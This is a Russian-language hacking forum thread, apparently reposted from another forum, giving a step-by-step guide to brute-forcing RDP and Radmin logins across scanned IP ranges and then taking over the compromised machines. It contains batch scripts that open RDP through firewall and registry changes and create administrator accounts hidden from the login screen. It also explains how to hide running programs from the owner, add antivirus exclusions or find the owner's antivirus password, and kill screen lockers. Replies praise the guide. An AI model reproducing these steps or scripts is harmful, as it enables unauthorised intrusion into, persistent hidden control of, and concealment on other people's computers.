1
  1. Этот сайт использует файлы cookie. Продолжая пользоваться данным сайтом, Вы соглашаетесь на использование нами Ваших файлов cookie. Узнать больше.
Приветствуем вас,Гость, на форуме IFUD.WS. Обязательно рекомендуется к прочтению правила форума http://ifud.ws/threads/obnovleno-pravila-foruma.7759

Большой F.A.Q. по бруту дедиков

Тема в разделе "Чужие", создана пользователем googie, 6 фев 2013.

  1. TopicStarter Overlay
    googie

    googie Команда форума

    Регистрация:
    27 июл 2012
    Сообщения:
    824
    Симпатии:
    616
    В этой статье я постараюсь более мение полностью описать весь процес брута дедиков и работу на дедике.
    И так приступим:
    1.Что такое дедик?
    Дедик - пошло от английского слова "dedicated", что с англиского значит выделенный. То есть Dedicated Server - выделенный сервер. Дедики, как их принято называть, на которых имеются довольно мощные сетевые интерфейсы, каналы и довольно не слабая аппаратная конфигурация
    служат для обработки данных, а также для хранения баз данных или любого другого материала находящегося на них для обслуживания персонала, фирмы или организации.
    2.Для чего предназначены дедики?
    Дедики можно использовать для абосолютно разных целей например для интернет серфинга, для брута, спама, можно ставить на нем игровые сервера (например я много раз находил на дедиках сервера кс) и т.д.
    3.Где достать дедик?
    Дедик можно купить, сбрутить или добыть с помощю трояна.
    4.Брут дедиков
    -Брут RDP
    RDP - протокол удалённого рабочего стола.
    Для брута RDP нам понадобитса следующие программы DuBrute RC2(сам брут)[forbidden link], vnc_scanner_GUI [forbidden link](сканер портов) и можно еще ipgeobase [forbidden link](база данных IP адресов). Программы не обязательно эти, можно и другие, но лично я пользуюсь етими.
    И так приступим.
    1.Запустите ipgeobase выберите округ, регин или город, скопируйте все ип адреса в буфер.
    2.Теперь запустите vnc_scanner_GUI и вставте в самое большое поле все ип адреса.
    И настроим его так:
    [​IMG]
    Теперь нажимаем Start Scan и ждем окончания работы.
    По окончании работы нажимаем Start Parser, теперь в файле IPs.txt сохранятса все ип адреса с открытым 3389 портом.
    3.Запускаем DuBrute RC2 и нажимаем Generation.
    Теперь нажимаем File IP и выбираем наш IPs.txt
    Нажимаем File Login и выбираем файл с логинами(можно добавить свои) обычно Login.txt
    Нажимаем File Pass и выбираем файл с паролями (тоже можете добавить свои) обычно Pass.txt
    Нажимаем Make и можем закрывать это окно.
    Теперь в папке с брутом в файле source.txt записаны все комбинации ип адресов, логинов и паролей.
    Нажимаем Config и Настроим его так:
    [​IMG]
    Нажимаем OK и все настройка брута закончена, нажимаем старт и ждем окончания работы.
    После окончание работы все гуды сохранятса в файле good.txt
    Вот и все на етом брут RDP закончен.
    -Брут Radmin
    1. Сам процес брута
    Radmin - программа для удалённого доступа.
    Для ее брута нам понадобитса lamescan3_r11 [forbidden link], ipgeobase [forbidden link] и клент радмина radmin viewer [forbidden link]
    1.Приступим, сначала запускаем lamescan3_r11 и нажимаем Настройка->основное
    Настроим его так:
    [​IMG]
    закрываем окно и нажимаем Настройка->Интерфейс там укажите путь к радмину, и поставте все галочки.
    Вот так:
    [​IMG]
    2.Запустите ipgeobase выберите округ, регин или город, скопируйте все ип адреса, в lamescan нажмите Диапазоны->Добавить в очередь->Список диапазонов, вставляем туда ип адреса и нажимаем Готово.
    Теперь включаем сканирование(зеленый треугольник) и ждем окончание работы.
    После окончания работы можете спокойно подлючатса к хосам к которым подобран пароль.
    Вот и все на етом брут Radminа закончен.
    2.Что делать дальше?
    После того как вы сбрутили несколько радминов нам понадобитса сделать с них дедик т.е. включить RDP(удалённый рабочий стол), и пропатчить систему на мультиюзерность(чтобы вы и админ не мешали друг другу).
    Приступим, включить RDP можно так:
    -Щелкаем Правой кнопкой мышки на Мой компютер->Свойства
    -Переходим на вкладку "Удалённые сеансы"
    -Ставим везде галочки
    или с помощю батника:
    @Echo off
    netsh firewall set service remoteadmin enable
    netsh firewall set service remotedesktop enable
    reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Contro l\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f
    Чтобы запустить батник на компютере у жертвы надо с помощю передачи файлов закинуть батник в недры виндовса и подключитса к командной строке, командой "cd Имя каталога" перейти в папку в которую положили батник и ввести в ней имя батника например batnik.bat
    Чтобы включить мультиюзерность надо пропатчить систему следующим патчем TS_Free [forbidden link] и перезагрузить компютер, запустить его можно также с использованием командной строки.
    Вот и все теперь можете подключитса к компютеру по RDP, но пользователя у вас пока не будет, как его создать читайте далее.
    5.Как создать и скрыть пользователя на дедике?
    Не буду розказывать о всех способах создание пользователя т.к. ето замет много времени, розкажу о основных.
    1.С помощю Управление компютером
    -Щелкаем Правой кнопкой мышки на Мой компютер->Управление
    -Локальные пользователи и группы->Пользователи->Правая кнопка мыши Новый пользователь и вводим имя, пароль и тд.(Галочку поставте только на 3 пункте)
    2.С помощю cmd
    Включаем cmd и создаем пользователя командами:
    net user Имя Пароль/add
    net localgroup Група администраторов Имя /add
    net localgroup Група пользователей RDP Имя /add
    net accounts /maxpwage:unlimited
    3.С помощю батника который создает и сразу скрывает пользователя с екрана приветствий
    Set AdmGroupSID=S-1-5-32-544
    Set AdmGroup=
    For /F "UseBackQ Tokens=1* Delims==" %%I In (`WMIC Group Where "SID = '%AdmGroupSID%'" Get Name /Value ^| Find "="`) Do Set AdmGroup=%%J
    Set AdmGroup=%AdmGroup:~0,-1%
    net user Имя_пользователя Пароль /add
    net localgroup %AdmGroup% Имя_пользователя /add
    Set RDPGroupSID=S-1-5-32-555
    Set RDPGroup=
    For /F "UseBackQ Tokens=1* Delims==" %%I In (`WMIC Group Where "SID = '%RDPGroupSID%'" Get Name /Value ^| Find "="`) Do Set RDPGroup=%%J
    Set RDPGroup=%RDPGroup:~0,-1%
    net localgroup "%RDPGroup%" Имя_пользователя /add
    net accounts /maxpwage:unlimited
    reg add HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserLis t
    reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserLis t" /v Имя_пользователя /t REG_DWORD /d "00000000" /f
    4.С помошю программы DED C14 [forbidden link] она создаст и скроет пользователя.

    5.Скрыть пользователя.
    Вот мы создали пользователя теперь надо скрыть его с екрана приветствия при запуске виндовс и в папке Documents and Settings, на скрытьии в папке останавлеватса не буду надеюсь все это знают.
    Чтобы скрыть пользователя в екране приветствия в ветке реестра
    HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserLis t
    нужно создать параметер типа DWORD с именем пользователя и значением 0.
    Вот и все тепер на дедике у нас есть свой скрытый пользователь.
    6.Как пользоватса дедиком не создавая пользователя(под админом) и не быть замеченым?
    Для того чтобы использовать дедик не создавая пользователя (на пользователе админа) нам нужны следующие программы hidetoolz [forbidden link], PS Tray Factory [forbidden link], DelTrayIcon [forbidden link].
    Начнем запускаем свои программы (с которыми вы собираетесь работать на дедике), все там запускаете, и теперь начнем их прятать:
    - Запускаем PS Tray Factory и в первых двух вкаладках отмечаем приложения которые хотим скрыть и сворачеваим эго(не выключаем). Посе етого действия пропадут окна нашых програм, но останетсу процесы иконка PS Tray Factory.
    - Запускаем DelTrayIcon и удаляем иконку PS Tray Factory и выключаем его. Мы удалили иконку PS Tray Factory осталось скрыть процесы PS Tray Factory и програм которые мы хотели скрыть.
    - Запускаем hidetoolz и на процесах которые создали наши приложения нажимаем правую кнопку мыши->HIDE и выключаем его.
    Если вы все сделали правильно то теперь наши программы работают на учетке админа полностю скрыто и он об етом даже не подозревает.
    Тепер чтобы увидеть окна вашых програм включите hidetoolz и зделайте все процесы видимыми, убейте в деспетчере задач процес PS Tray Factory, система немного залагает и покажет вам окна всех програм которые вы скрыли.
    7.Что делать если антивирус на дедике удаляет ваши программы?
    Обяснять для каждого антивируса очень долго но розкажу в общем виде(если что поищите в гугле).
    Нужно создать папку гдето в недрах виндовс, добавить в настройках антивируса нашу папку в исключения и скачать в нее все программы.
    Если антивирь не разрешает изменений и просит пароль можем попытатса выключить его, или в крайнем случае поискать в текстовых документах админа пароль к ав. Удалять его не стоит так как админ сразу спалит вас и выгонит со своего компа.
    8.Что делать если на дедике ScreenLocker?
    Как обойти новые локеры я чесно говоря не знаю, но можно попытатса вызвать диспетчера задач комбинацией клавиш [Ctrl]+[Shift]+[Esc] и убить процес локера, или вызвать командную строку с помощю [Win]+[R] ввести cmd и в ней командами tasklist и taskkill убить процес локера, можно попытатса переключитса на другое окно с помощю [Alt]+[Tab] или если есть доступ до файлов с помощю техже команд что написал выше убить процес батником.
    Вот и все на етом моя статья закончена если будут еще какието вопросы или идеи что добавить в статью говорите.
    Прошу сильно не ругать это моя первая статья.

    (с) античата
     
    • Like Like x 3
    Метки:
  2. Ltybcrf

    Ltybcrf Гость

    Эта вобще мне понравилась статья )
    Просто доступно и собрано в pack )
    +

    тут посмеялся как обойти незнает и тут же 2 способа обхода )))
    жжёшь )
     
  3. TopicStarter Overlay
    googie

    googie Команда форума

    Регистрация:
    27 июл 2012
    Сообщения:
    824
    Симпатии:
    616
    копирнул, как было :)
     
  4. max46

    max46

    Регистрация:
    18 окт 2012
    Сообщения:
    123
    Симпатии:
    26
    Всё ясно и понятно,молодец!)...Оформления вообще на 5 :rolleyes:
     
  5. lizzka59

    lizzka59 Падший Ангел

    Регистрация:
    1 май 2013
    Сообщения:
    209
    Симпатии:
    40
    Добавься пожалуйста в скайпе :) логин lizzkagol
     
  6. comynicator

    comynicator

    Регистрация:
    18 ноя 2013
    Сообщения:
    12
    Симпатии:
    1
    ipgeobase это прога или какой то ресурс?Если прога дайте ссылку.Заранее благодарен.
     
  7. TopicStarter Overlay
    googie

    googie Команда форума

    Регистрация:
    27 июл 2012
    Сообщения:
    824
    Симпатии:
    616
    Please login or register to view links
     

Поделиться этой страницей

Загрузка...